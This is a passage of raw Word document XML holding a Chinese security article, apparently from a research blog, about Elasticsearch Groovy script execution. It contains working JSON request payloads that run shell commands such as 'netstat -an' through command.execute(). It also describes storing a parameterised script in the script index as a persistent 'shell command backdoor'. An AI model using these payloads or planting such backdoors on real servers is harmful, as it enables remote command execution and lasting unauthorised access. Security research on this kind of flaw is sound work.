          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>netstat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E86707">
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> -an\"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E86707">
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E86707">
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>def</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E86707">
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> res=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E86707">
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>command.execute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E86707">
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>().</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E86707">
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>text;res</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E86707">
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>","</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E86707">
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>lang</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E86707">
        <w:rPr>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>":"groovy"}}}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E86707" w:rsidRDefault="00E86707" w:rsidP="00E86707"/>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color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D96492">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>效果如下图所示：</w:t>
      </w:r>
    </w:p>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D96492">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D96492">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://blog.nsfocus.net/wp-content/uploads/2015/04/script1.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D96492">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D96492">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1074" type="#_x0000_t75" alt="script" style="width:24pt;height:24pt"/>
        </w:pict>
      </w:r>
      <w:r w:rsidRPr="00D96492">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>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D96492">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>官方文档除了直接执行脚本，还提供了一种预先存储脚本用于以后执行的方式——脚本索引，这种方法使用起来比较繁琐，下面我们先来看官方提供的示例：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建立脚本索引</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>curl</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -XPOST localhost:9200/_scripts/groovy/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>indexedCalculateScore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -d '{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">     "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">": "log(_score * 2) + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>my_modifier</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t>}'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用脚本索引，并执行脚本索引中的代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>curl</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -XPOST localhost:9200/_search -d '{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">  "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>query</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>": {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>function_score</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">      "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>query</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>": {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>match</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>": {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">          "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>": "foo"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">      },</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">      "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>functions</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">          "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>script_score</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>script_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>indexedCalculateScore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>lang</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>" : "groovy",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>params</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>": {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">              "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>my_modifier</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">          }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">      ]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E86707" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t>}'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">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下面我们来看实际操作，首先是建立脚本索引：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">     "script": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>def</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command=\"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netstat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -an\"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>def</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> res=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>command.execute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>().</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>text;res</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">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然后是执行刚刚建立的脚本索引，由于官方给的示例中不可以返回字符串，所以这里我修改了POST提交的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>query</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>" : {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">       "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>match_all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>script_fields</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">        "test1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>script_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>indexedCalculateScore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>lang</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>":"groovy"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">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这种方法相比较直接执行脚本多了一个存储的步骤，但是却不失为一种留后门的好方法。如果我们这样建立一条脚本索引：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">     "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>def</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> res=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>command.execute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>().</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>text;res</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">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然后这样执行它：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>query</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>" : {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">       "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>match_all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>script_fields</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">        "test1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>script_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>indexedCalculateScore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>lang</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>":"groovy",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>params</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>":{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">                 "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>command</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>":"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netstat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -an"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">             }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>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color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D96492">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>完美的一个shell命令后门就完成了，效果如下图所示：</w:t>
      </w:r>
    </w:p>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D96492">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D96492">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://blog.nsfocus.net/wp-content/uploads/2015/04/indexed-script1.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D96492">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D96492">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1076" type="#_x0000_t75" alt="indexed-script" style="width:24pt;height:24pt"/>
        </w:pict>
      </w:r>
      <w:r w:rsidRPr="00D96492">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
